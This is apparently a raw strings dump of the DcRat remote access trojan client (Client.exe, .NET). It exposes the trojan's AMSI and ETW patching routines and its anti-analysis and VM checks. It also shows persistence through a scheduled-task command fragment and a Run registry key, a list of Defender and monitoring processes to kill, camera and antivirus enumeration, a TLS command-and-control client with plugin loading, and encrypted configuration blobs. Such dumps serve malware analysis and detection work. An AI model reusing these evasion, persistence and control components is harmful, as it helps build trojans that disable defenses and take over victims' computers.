!This program cannot be run in DOS mode.
`.rsrc
@.reloc
jX jX(
jX$jX(
jX jX(
jX$jX(
v4.0.30319
#Strings
Q ^ i f
Action`10
InvalidParameter10
D84F4C120005F1837DC65C04181F3DA9466B123FC369C359A301BABC12061570
<>c__DisplayClass5_0
<>c__DisplayClass6_0
<PatchMem>b__0
<GetFiltes>b__0
<>p__0
AbandonedWait0
InvalidParameter11
IEnumerable`1
CallSite`1
List`1
InvalidParameter1
AbandonedWait1
InvalidParameter12
PROCESSENTRY32
Microsoft.Win32
ToUInt32
ReadInt32
ToInt32
SwapInt32
Func`2
X509Certificate2
InvalidParameter2
AbandonedWait2
<>o__53
AbandonedWait63
Func`3
InvalidParameter3
AbandonedWait3
E123F60E9FC6E974D1381F2F15FB19E7960628CC8925D65E344C2F2BDC64F424
WriteUInt64
ToUInt64
GetAsUInt64
SetAsUInt64
ToInt64
SwapInt64
InvalidParameter4
__StaticArrayInitTypeSize=5
CABAFE20CFEA6C92D3377C14650461E190857D48D13934B5562233C314AAFBB5
InvalidParameter5
InvalidImageWin16
ToUInt16
ReadInt16
ToInt16
SwapInt16
HMACSHA256
Aes256
aes256
__StaticArrayInitTypeSize=6
InvalidParameter6
InvalidParameter7
get_UTF8
InvalidParameter8
InvalidParameter9
<Module>
MessagePackLib.<PrivateImplementationDetails>
0C50C67E839472CD612D6033109F5E032987E48E367247F29C0EB30A1D3EB5FC
ES_SYSTEM_REQUIRED
ES_DISPLAY_REQUIRED
MapNameToOID
GetTypeFromCLSID
th32ModuleID
th32DefaultHeapID
th32ProcessID
th32ParentProcessID
get_FormatID
EXECUTION_STATE
87639126EA77B358F26532367DBA67C5310EF50A8D9888ED070CD40E1F605A8F
get_ASCII
LASTINPUTINFO
System.IO
IsServerOS
ES_CONTINUOUS
NTSTATUS
get_IV
set_IV
GenerateIV
PatchETW
value__
Camera
havecamera
NotMappedData
ReadServertData
PropertyData
NoTxfMetadata
PagefileQuota
mscorlib
ProcessInJob
ProcessNotInJob
DifferenceAtDc
BadInitialPc
System.Collections.Generic
Microsoft.VisualBasic
get_SendSync
KernelApc
UserApc
dwProcessId
processId
ObjectPathSyntaxBad
EndRead
BeginRead
BlockThread
InnerAdd
RecoveryNotNeeded
PagefileQuotaExceeded
ArrayBoundsExceeded
SemaphoreLimitExceeded
SuspendCountExceeded
ThreadWasSuspended
SectionNotExtended
b64encoded
SHA256Managed
AccessDenied
RangeNotLocked
get_Enabled
set_Enabled
ServerDisabled
AccountDisabled
ServerNotDisabled
TimerNotCanceled
RequestCanceled
IoPrivilegeFailed
LogGrowthFailed
TransactionPropagationFailed
TmInitializationFailed
PrimaryTransportConnectFailed
Cancelled
FileRenamed
NotAllAssigned
TransactionNotJoined
Abandoned
ProcessCloned
MutantNotOwned
NoneMapped
SomeNotMapped
ProfilingNotStopped
RegistryRecovered
PasswordExpired
RollbackTimerExpired
FormsAuthRequired
SynchronizationRequired
CheckOutRequired
FileForcedClosed
FileClosed
HandlesClosed
PortClosed
PortConnectionRefused
VirusInfected
get_Connected
PipeConnected
get_IsConnected
set_IsConnected
PipeDisconnected
RmDisconnected
LpcReceiveBufferExpected
LogCorruptionDetected
ProcessIsProtected
FileDeleted
VirusDeleted
LockNotGranted
NotImplemented
VolumeMounted
ProfilingNotStarted
RmAlreadyStarted
Alerted
TransactionAlreadyAborted
CtlFileNotSupported
EasNotSupported
TooManyGuidsRequested
TooManyLuidsRequested
TransactionNotRequested
GuidsExhausted
LuidsExhausted
AgentsExhausted
RxActCommitted
NotCommitted
TransactionAlreadyCommitted
Received
TransactionalOpenNotAllowed
LpcRequestsNotAllowed
InvalidCid
InvalidSid
HandleNoLongerValid
StreamMiniversionNotValid
CurrentTransactionNotValid
TransactionRequestNotValid
FileInvalid
ObjectNameInvalid
ObjectPathInvalid
get_Guid
PrivilegeNotHeld
<SendSync>k__BackingField
<Enabled>k__BackingField
<IsConnected>k__BackingField
<KeepAlive>k__BackingField
<HeaderSize>k__BackingField
<ActivatePo_ng>k__BackingField
<Ping>k__BackingField
<Interval>k__BackingField
<Buffer>k__BackingField
<Offset>k__BackingField
<SslClient>k__BackingField
<TcpClient>k__BackingField
InnerAddMapChild
InnerAddArrayChild
FloatDenormalOperand
Append
RegistryValueKind
ResourceDataNotFound
ResourceNameNotFound
ObjectNameNotFound
ResourceTypeNotFound
ProcedureNotFound
ObjectPathNotFound
OrdinalNotFound
DllNotFound
CrmProtocolNotFound
StreamMiniversionNotFound
EntryPointNotFound
method
IllFormedPassword
WrongPassword
Replace
NotSameDevice
NoSuchDevice
NoMediaInDevice
CreateInstance
source
exitCode
set_Mode
InvalidReadMode
FileMode
PaddingMode
EnterDebugMode
CryptoStreamMode
CompressionMode
CipherMode
SelectMode
decode
utf8Encode
DeleteSubKeyTree
PageFaultGuardPage
SectionNotImage
BindToStorage
LpcInvalidConnectionUsage
cntUsage
get_Message
InvalidMessage
NoSuchPrivilege
WorkingSetLimitRange
EaTooLarge
FileTooLarge
DynamicAPIInvoke
DynamicInvoke
EndInvoke
BeginInvoke
DynamicFunctionInvoke
InstanceNotAvailable
PipeNotAvailable
IEnumerable
IDisposable
ToDouble
SwapDouble
InvalidHandle
RuntimeFieldHandle
RuntimeTypeHandle
CloseHandle
GetTypeFromHandle
dwProcessHandle
WaitHandle
bInheritHandle
InvalidPortHandle
handle
WriteSingle
ToSingle
SetAsSingle
Install_File
szExeFile
EndOfFile
PageFaultPagingFile
NoSuchFile
DecodeFromFile
NoEasOnFile
SaveBytesToFile
TmVolatile
IsInRole
WindowsBuiltInRole
Console
GetActiveWindowTitle
get_MainModule
ProcessModule
set_WindowStyle
ProcessWindowStyle
DLLName
get_Name
InvalidEaName
get_FileName
set_FileName
GetTempFileName
GetFileName
fileName
get_ModuleName
get_MachineName
get_OSFullName
get_FullName
IsValidDomainName
FunctionName
PropName
get_UserName
InvalidComputerName
lowerName
SetName
InvalidAccountName
ExportName
CheckHostName
DateTime
get_LastWriteTime
ToUniversalTime
dwTime
WrongVolume
WriteLine
Combine
ManagementScope
ComInterfaceType
BadFileType
UriHostNameType
FunctionDelegateType
get_ValueType
valueType
OfType
MsgPackType
ProtocolType
GetType
SocketType
FileShare
Compare
System.Core
DInvokeCore
DllMightBeInsecure
LogonFailure
Server_signa_ture
ResourceInUse
TokenAlreadyInUse
ModuleBase
ReadOnlyCollectionBase
pcPriClassBase
ImageNotAtBase
Dispose
Reparse
DataLate
Certifi_cate
X509Certificate
Server_Certificate
ValidateServerCertificate
certificate
Create
MulticastDelegate
NothingToTerminate
InvalidPipeState
SetThreadExecutionState
CannotDelete
CallSite
PageFaultCopyOnWrite
TransactedMappingUnsupportedRemote
TransactionsUnsupportedRemote
CompilerGeneratedAttribute
GuidAttribute
DebuggableAttribute
ComVisibleAttribute
AssemblyTitleAttribute
InterfaceTypeAttribute
AssemblyTrademarkAttribute
TargetFrameworkAttribute
AssemblyFileVersionAttribute
AssemblyConfigurationAttribute
AssemblyDescriptionAttribute
DefaultMemberAttribute
UnmanagedFunctionPointerAttribute
CompilationRelaxationsAttribute
AssemblyProductAttribute
AssemblyCopyrightAttribute
AssemblyCompanyAttribute
RuntimeCompatibilityAttribute
set_UseShellExecute
ReadByte
WriteByte
get_Value
DeleteValue
innerValue
GetValue
SetValue
get_KeepAlive
set_KeepAlive
RmNotActive
TransactionNotActive
DebuggerInactive
Remove
Client.exe
get_Size
cbSize
LogResizeInvalidSize
set_BlockSize
get_TotalSize
RegionSize
get_HeaderSize
set_HeaderSize
set_SendBufferSize
set_ReceiveBufferSize
dwSize
set_KeySize
SizeOf
IndexOf
CantTerminateSelf
IID_IPropertyBag
strFlag
SectionTooBig
CryptoConfig
get_ActivatePo_ng
set_ActivatePo_ng
get_Ping
set_Ping
System.Threading
set_Padding
add_SessionEnding
SystemEvents_SessionEnding
DeletePending
UTF8Encoding
System.Drawing.Imaging
PipeListening
System.Runtime.Versioning
Warning
FromBase64String
ToBase64String
ReadString
DownloadString
WriteString
ToString
get_AsString
set_AsString
BytesAsString
GetAsString
SetAsString
GetString
BytesAsHexString
Substring
PipeClosing
ThreadIsTerminating
ProcessIsTerminating
ClearSetting
System.Drawing
CouldNotResizeLog
ErrorLog
set_ErrorDialog
ObjectTypeMismatch
InfoLengthMismatch
RevisionMismatch
RemoteFileVersionMismatch
x64_am_si_patch
x86_am_si_patch
x64_etw_patch
x86_etw_patch
RecursiveDispatch
ComputeHash
VerifyHash
get_ExecutablePath
GetTempPath
HmacSha256Length
get_Length
IvLength
AuthKeyLength
EndsWith
Patcham_si
PtrToStringAnsi
msgpackObj
listObj
MessagePackLib.MessagePack
MsgPack
AsyncCallback
RemoteCertificateValidationCallback
TimerCallback
callback
unpack_msgpack
BadStack
BadInitialStack
FloatStackCheck
RegistryKeyPermissionCheck
FlushFinalBlock
StopBlock
StartBlock
strVal
RtlSetProcessIsCritical
ProcessCritical
Marshal
NetworkCredential
Informational
System.Security.Principal
WindowsPrincipal
AreEqual
get_Interval
set_Interval
InvalidAcl
BadInheritanceAcl
InvalidVolumeLabel
ImpersonationLevel
BufferTooSmall
In_stall
Client.Install
kernel32.dll
user32.dll
ntdll.dll
DiskFull
WriteNull
SetAsNull
MutexControl
Unsuccessful
DirectoryNotRm
UnableToFreeVm
Encode2Stream
FileStream
NetworkStream
SslStream
DecodeFromStream
CryptoStream
GZipStream
MemoryStream
Program
PatchMem
get_Item
get_Is64BitOperatingSystem
Client.Algorithm
SymmetricAlgorithm
AsymmetricAlgorithm
HashAlgorithm
Random
ICryptoTransform
CLSID_SystemDeviceEnum
MsgPackEnum
ICreateDevEnum
WriteBoolean
ToBoolean
SetAsBoolean
HwidGen
NoImpersonationToken
NoToken
CantRecoverWithHandleOpen
children
TransactionsNotFrozen
X509Chain
AppDomain
get_CurrentDomain
Paste_bin
IsAdmin
LastAdmin
Ver_sion
ObjectNameCollision
UnknownRevision
GetFileNameWithoutExtension
get_OSVersion
NoSuchLogonSession
System.IO.Compression
Application
System.Security.Authentication
GuardPageViolation
SharingViolation
AccessViolation
set_Impersonation
FloatInvalidOperation
InvalidWorkstation
MiniversionInaccessibleFromSpecifiedTransaction
InvalidTransaction
EfsNotAllowedInTransaction
CannotExecuteFileInTransaction
UnableToDeleteSection
System.Reflection
PropertyDataCollection
ProcessModuleCollection
X509CertificateCollection
ManagementObjectCollection
Client.Connection
InvalidPageProtection
SectionProtection
PasswordRestriction
AccountRestriction
IllegalFunction
function
PrivilegedInstruction
IllegalInstruction
PageFaultTransition
set_Position
position
CallingConvention
TransactionRequiredPromotion
CryptographicException
DllNotFoundException
MissingMethodException
NonContinuableException
ArgumentNullException
InvalidOperationException
get_InnerException
ManagementException
ArgumentException
StringComparison
DataOverrun
Unknown
ImageCodecInfo
SendInfo
FileInfo
DriveInfo
FileSystemInfo
ComputerInfo
CSharpArgumentInfo
ProcessStartInfo
PageFaultDemandZero
MappedFileSizeZero
IntegerDivideByZero
FloatDivideByZero
IncompatibleFileMap
WriteMap
PreventSleep
SingleStep
CrashDump
LongJump
currentApp
Microsoft.CSharp
NotifyCleanup
NoSuchGroup
SpecialGroup
MemberInGroup
MemberNotInGroup
InvalidPrimaryGroup
MembersPrimaryGroup
NormalStartup
System.Linq
InvalidSecurityDescr
InvokeMember
MD5CryptoServiceProvider
RSACryptoServiceProvider
AesCryptoServiceProvider
StringBuilder
Install_Folder
IdSender
sender
Microsoft.CSharp.RuntimeBinder
CallSiteBinder
GetEncoder
get_Buffer
set_Buffer
TransactionInvalidMarshallBuffer
WriteInteger
get_AsInteger
set_AsInteger
GetAsInteger
SetAsInteger
ManagementObjectSearcher
IMoniker
IEnumMoniker
ppEnumMoniker
moniker
SessionEndingEventHandler
InvalidOwner
Client.Helper
isVM_by_wim_temper
ToUpper
NoSuchUser
SpecialUser
CurrentUser
InvalidParameter
StreamWriter
TextWriter
GetDelegateForFunctionPointer
BitConverter
LogonServer
ToLower
NotifyEnumDir
EnlistmentNotSuperior
DataError
CrcError
InPageError
InternalError
EaCorruptError
IEnumerator
CreateClassEnumerator
ManagementObjectEnumerator
System.Collections.IEnumerable.GetEnumerator
Activator
.cctor
Monitor
CreateDecryptor
CreateEncryptor
IntPtr
System.Diagnostics
cntThreads
TooManyThreads
NativeMethods
Microsoft.VisualBasic.Devices
FindDevices
System.Runtime.InteropServices
System.Runtime.CompilerServices
InsufficientResources
DebuggingModes
set_EnablePrivileges
Matches
NoMoreEntries
get_Properties
ExpandEnvironmentVariables
TooManyOpenedFiles
NoMoreFiles
TooManyPagingFiles
get_Modules
System.Runtime.InteropServices.ComTypes
GetProcesses
ConflictingAddresses
GetHostAddresses
System.Security.Cryptography.X509Certificates
Delegates
GetFiltes
Encode2Bytes
GetUtf8Bytes
utf8Bytes
Rfc2898DeriveBytes
ReadAllBytes
DecodeFromBytes
SwapBytes
LoadFileAsBytes
GetAsBytes
SetAsBytes
GetBytes
rawBytes
CSharpArgumentInfoFlags
CSharpBinderFlags
esFlags
dwFlags
InitializeSettings
SessionEndingEventArgs
Anti_Analysis
RunAntiAnalysis
ICredentials
set_Credentials
Equals
SslProtocols
ReadTools
WriteTools
BytesTools
System.Windows.Forms
CantCreateMoreStreamMiniversions
System.Collections
ConnectionOptions
StringSplitOptions
RemoveLastChars
FileLockedWithOnlyReaders
GetImageDecoders
EnumMonikers
RuntimeHelpers
Parameters
FileLockedWithWriters
NoLogonServers
SslPolicyErrors
sslPolicyErrors
InvalidLogonHours
InvalidInfoClass
CallbackBypass
dwDesiredAccess
FileAccess
Success
Anti_Process
TerminateProcess
AntiProcess
KillProcess
ThreadNotInProcess
OpenProcess
GetCurrentProcess
IPAddress
InvalidAddress
GetLoadedModuleAddress
get_BaseAddress
GetExportAddress
GetLibraryAddress
OpLockBreakInProgress
Compress
Decompress
Por_ts
Hos_ts
System.Net.Sockets
set_Arguments
SystemEvents
ObjectNameExists
GroupExists
ObjectNoLongerExists
UserExists
TransactionSuperiorExists
CrmProtocolAlreadyExists
Antivirus
MaximumNtStatus
Concat
InvalidImageLeFormat
InvalidImageFormat
format
WriteFloat
get_AsFloat
set_AsFloat
GetAsFloat
SetAsFloat
FindObject
ManagementBaseObject
ReparseObject
ForcePathObject
ReleaseComObject
ManagementObject
object
Collect
Connect
Reconnect
OldProtect
InvalidImageProtect
NewProtect
FileLockConflict
TransactionalConflict
System.Net
TransactionScopeCallbacksNotSet
PortNotSet
PortAlreadySet
Target
target
KeepAlivePacket
ClientSocket
System.Collections.IEnumerator.Reset
get_Offset
set_Offset
CantWait
op_Explicit
BadWorkingSetLimit
CommitmentLimit
ControlCExit
ClientOnExit
get_Default
FirstOrDefault
IAsyncResult
FloatInexactResult
result
WebClient
InitializeClient
get_SslClient
set_SslClient
get_TcpClient
set_TcpClient
AuthenticateAsClient
System.Management
DatatypeMisalignment
Environment
parent
System.Collections.IEnumerator.Current
System.Collections.IEnumerator.get_Current
GetCurrent
TxfMetadataAlreadyPresent
CantOpenMiniversionWithModifyIntent
EaListInconsistent
FileIdentityNotPersistent
get_RemoteEndPoint
Breakpoint
get_Count
get_ProcessorCount
SpecialAccount
NoQuotasForAccount
amount
CreateToolhelp32Snapshot
hSnapshot
GetPathRoot
RmMetadataCorrupt
TxfAttributeCorrupt
Decrypt
Encrypt
ParameterizedThreadStart
Convert
FailFast
InvalidDeviceRequest
ToList
IndoubtTransactionsExist
MessageLost
Process32First
FileCheckedOut
IoTimeout
Process32Next
System.Collections.IEnumerator.MoveNext
System.Text
GetWindowText
NotMappedView
GetForegroundWindow
set_CreateNoWindow
FloatUnderflow
BufferOverflow
IntegerOverflow
FloatOverflow
CloseMutex
CreateMutex
InvalidParameterMix
IBindCtx
De_lay
WirteArray
InitializeArray
MsgPackArray
ToArray
get_AsArray
refAsArray
CantBreakTransactionalDependency
get_Key
set_Key
CreateSubKey
DeleteSubKey
OpenSubKey
get_PublicKey
_authKey
masterKey
RegistryKey
System.Security.Cryptography
Assembly
AddressFamily
BlockCopy
PartialCopy
CantCrossRmBoundary
WriteBinary
ToBinary
library
ObjectQuery
SelectQuery
CLSID_VideoInputDeviceCategory
category
NtProtectVirtualMemory
NoMemory
CantDisableMandatory
get_SystemDirectory
NonExistentEaEntry
SetRegistry
DeviceBusy
PipeBusy
op_Equality
op_Inequality
InvalidSubAuthority
InvalidIdAuthority
System.Net.Security
WindowsIdentity
PipeEmpty
IsNullOrEmpty
TxfDirNotEmpty
VolumeDirty
InvalidImageNotMz
System.Security.Permissions.SecurityPermissionAttribute, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089
ControlThread
WrapNonExceptionThrows
1.0.7.0
.NETFramework,Version=v4.8
FrameworkDisplayName
.NET Framework 4.8
$29840822-5B84-11D0-BD3B-00A0C911CE86
$55272A00-42CB-11CE-8135-00AA004BB851
_CorExeMain
mscoree.dll
<?xml version="1.0" encoding="utf-8"?>
<assembly manifestVersion="1.0" xmlns="urn:schemas-microsoft-com:asm.v1">
<assemblyIdentity version="1.0.7.0" name="MyApplication.app"/>
<trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">
<security>
<requestedPrivileges xmlns="urn:schemas-microsoft-com:asm.v3">
<requestedExecutionLevel level="asInvoker" uiAccess="false" />
</requestedPrivileges>
</security>
</trustInfo>
<compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1">
<application>
<!-- A list of the Windows versions that this application has been tested on
and is designed to work with. Uncomment the appropriate elements
and Windows will automatically select the most compatible environment. -->
<!-- Windows Vista -->
<!--<supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}" />-->
<!-- Windows 7 -->
<!--<supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}" />-->
<!-- Windows 8 -->
<!--<supportedOS Id="{4a2f28e3-53b9-4441-ba9c-d69d4a4a6e38}" />-->
<!-- Windows 8.1 -->
<!--<supportedOS Id="{1f676c76-80e1-4239-95bb-83d0f6d0da78}" />-->
<!-- Windows 10 -->
<!--<supportedOS Id="{8e0f7a12-bfb3-4fe8-b9a5-48fd50a15a9a}" />-->
</application>
</compatibility>
<!-- Indicates that the application is DPI-aware and will not be automatically scaled by Windows at higher
DPIs. Windows Presentation Foundation (WPF) applications are automatically DPI-aware and do not need
to opt in. Windows Forms applications targeting .NET Framework 4.6 that opt into this setting, should
also set the 'EnableWindowsFormsHighDpiAutoResizing' setting to 'true' in their app.config. -->
<application xmlns="urn:schemas-microsoft-com:asm.v3">
<windowsSettings>
<dpiAware xmlns="http://schemas.microsoft.com/SMI/2005/WindowsSettings">true</dpiAware>
<dpiAwareness xmlns="http://schemas.microsoft.com/SMI/2016/WindowsSettings">PerMonitorV2, PerMonitor</dpiAwareness>
<longPathAware xmlns="http://schemas.microsoft.com/SMI/2016/WindowsSettings">true</longPathAware>
</windowsSettings>
</application>
<!-- Enable themes for Windows common controls and dialogs (Windows XP and later) -->
<!--
<dependency>
<dependentAssembly>
<assemblyIdentity
type="win32"
name="Microsoft.Windows.Common-Controls"
version="6.0.0.0"
processorArchitecture="*"
publicKeyToken="6595b64144ccf1df"
language="*"
/>
</dependentAssembly>
</dependency>
</assembly>
SHA256
|gCm3suSAEU2Ytf/bkpSnAe6OYQnABEmi+n3dH9G+dxetigFT2YcpkG3HgYLs7aD/Km1jYdeHZiBxNuq1mHf5xA==
zH/Vudxy14TxPthfq6JnGzeZe9j3aaNUU9J+y8zUbCbqyZEBUP1TbiPu+PpoT/P+DexGSFjO4hj1kcSoD02b8Q==
4ca9dueFnJurK2NM8SqBXoEv62tg+jqqqh3bkK9GN2vlz8yhgTth9BMmVhe+e6X2+KiR5Rfi8+3kACnC5VfOaA==
7NRCgmAIdpJxbfALaeyOXoGJxVAOz14H0jjBTZDoXPkwJb1H7M+9EJHqaAMihY/QXwFNE/K0gcd7PtNCPEPy2g==
%AppData%
ZmlNQ20xUzlqcElPMXE0TzhodmpzWVpuUm9BTkFrdjM=
Gz7Fi+OTPzDOPwbt8o8GFhW5BJh9xC23Vy3kGe+DDznoprHP3I8sahkDUv4ayuq7x8q2T4B8V4EoS+CCU/RI48swsL9C0rPNtolKiCQIpBs=
6rWo6qBYso5WPVkiyvillKklCsJPWz2Eg7RbRFAc4J1I2FP7K9AxS0Q4C8J/sVEIBaaVzkg5e8blNoNyjF5903aqmTaYN13ZIgcw81wAQWiZeE5BhKcvHYLjFB0rD9v58Hp3RqDg3c6sCU4Mvc/mSFmbYaYJ73A8mMB7pLLGoINM6FMH5RuN75yVaBwYSHHIJ285eioXB1sNvJGLCZP76oudwtB5sy9ifiMmdWmcvLeuIJYOpLIoyYCnFOjbcqhKR5KfOG7CUNDAdkpn+JwanLjHXeJF5B3VdoIGv9rjBVUoSs2RmWwbM75fNUAmPHvqS7/+OtFjISSemKtLdVIIrVqCf6EaJkhaosuwHYtFARaN6F578+51tMptyRQzE4g2K0AiPLlKlH+DJiZZTExE86LtepAs7IGQfXs0Tyh/i4jj6mXFelGu516TGgJOrb98gc2l7HAeSfzkpsal/Ip3NwK/c15JKnMfpMVdZpEblRnwI7yiYPG/SychteRn5h/4qDDTC7bNwXURMrXZ1CkJBidsgPOa9fMbawgIekA2aEtNyFvzZFF3+fCWSrLRwtzxaLJNXq4AwOPRzoe6za+pIaFtPr/aVlfDk81XA0CVYgz2ggjtSnFuuvYUaAO+0h3jUGx/a3zkrI+4/Ctp5fm5H8fQaVAdSPAtfzKpPvPo58QpCZigQhN1a4veOH3yYTx8f3b0e9V+wJMHc8ZLmopr1oq4VfpUpGeRIdvea36SHk9H+uxwSZoVaykx3Iq/kRcFBzBUd64DpJjeCr3Z76GhXdR5IGD7obFapONm0UcQvcbXtxO3FUPmfb8ERChJmtCl9tSG5DS+d8G6gHeMCw0Q+8h9oboktZL3MJUrAICGwkglAC8Vci67H8EFCPWicZwAjkQx59tAPtI+qcslnyQU27weEUG0xGDaKbendV5lrmllJWwPX1Ik9yYkxPInkZ/278T6cuqYyXCg6YMBW5vQNdVmuttxjhCWkINyhgLiGntLBwoz+vVu0Ey1LnxWsGB0
+7U8RgU1yTKLc7XC8UeDpMP62YV3f8xS7ecAvwtRdRubHr73BT//naFWHtZNc2H5c7FzvVh7WI2MBpY+5O3umN3FzJkqU0AFC+JumExWxT2VqkaTErMcMO0EO5i2CpdQGDSg8+ls/NuRg2eNua1zBeTvbfBM+KZAmjKgXHBb137vua4VPQ1YqdzzwW9elRYGgP7wwpqALZS9HTw1cq/orGtr0ED5O8j2GkQNlO75KU25U2RTmY/zaiqy0gKJl4NeL2/9GA/pAoL51J99S3YoOyHY8GJYc/yFZY6vrEtQ2RA=
f6jM+G6ijj0JflMw3itdr5hJQdsNWvLkVYsBg3yXqedmGeXNEI88Rdx8m/uKsxGvuR+BDupmC4PR946E5Idg5g==
6g4Pn3tFl/PbuyeESAYOwHI+cJPaUgOCMf6z7bSglth12AttJCryG5kgfsR0udCZJzenReZY5qB7IsOA/UiiuA==
TDHrHJ3/L8oaRhTDJecwKaAzflFEciyQzzmg/PSo2v7F3gPtcx5G2f2DTDXMJRZQ/LZZtDbSSAWLZeHndMxnQQ==
mOiQB5sA0LSRvo4iVzoV+RR6nPXZ+avpo7V/Kw8JRnGCTI+znWZMo7uFZHrDljg9zv7wVCKb/+7cGRp6Z0F3dA==
PDqJXfgenH5dsi+T/g1fmBxC+8jAzho2CWj1BHlYod8C3XcR+3qP2GlfgPwu1KUh2DQA6bnShvdUsLEj4qmPbg==
Pac_ket
Message
plu_gin
save_Plugin
sendPlugin
Hashes
Plugin.Plugin
Msgpack
UmVjZWl2ZWQ=
/c schtasks /create /f /sc onlogon /rl highest /tn "
" /tr '"
"' & exit
SOFTWARE\Microsoft\Windows\CurrentVersion\Run\
@echo off
timeout 3 > NUL
START "" "
" /f /q
Install Failed :
Taskmgr.exe
ProcessHacker.exe
procexp.exe
MSASCui.exe
MsMpEng.exe
MpUXSrv.exe
MpCmdRun.exe
NisSrv.exe
ConfigSecurityPolicy.exe
MSConfig.exe
Regedit.exe
UserAccountControlSettings.exe
taskkill.exe
\\{0}\root\CIMV2
SELECT * FROM Win32_OperatingSystem
ProductType
Select * from Win32_CacheMemory
{860BB310-5D01-11d0-BD3B-00A0C911CE86}
{62BE5D10-60EB-11d0-BD3B-00A0C911CE86}
{55272A00-42CB-11CE-8135-00AA004BB851}
FriendlyName
Err HWID
ClientInfo
Microsoft
Camera
Version
Perfor_mance
Paste_bin
Anti_virus
Install_ed
\root\SecurityCenter2
Select * from AntivirusProduct
displayName
Unknown
Environment
windir
Software
Classes
mscfile
ms-settings
, Dll was not found or not loaded.
Failed to parse module exports.
, export not found.
Could not get the handle for the function.
ntdll.dll
NtProtectVirtualMemory
not found.
[!] {0}
YW1zaS5kbGw=
AmsiScanBuffer
EtwEventWrite
Software\
masterKey can not be null or empty.
input can not be null.
Invalid message authentication code (MAC).
DcRatByqwqdanchun
{0:D3}
{0:X2}
(never used) type $c1
(ext8,ext16,ex32) type $c7,$c8,$c9
VS_VERSION_INFO
VarFileInfo
Translation
StringFileInfo
000004b0
Comments
CompanyName
FileDescription
FileVersion
1.0.7.0
InternalName
Client.exe
LegalCopyright
LegalTrademarks
OriginalFilename
Client.exe
ProductName
ProductVersion
1.0.7.0
Assembly Version
1.0.7.0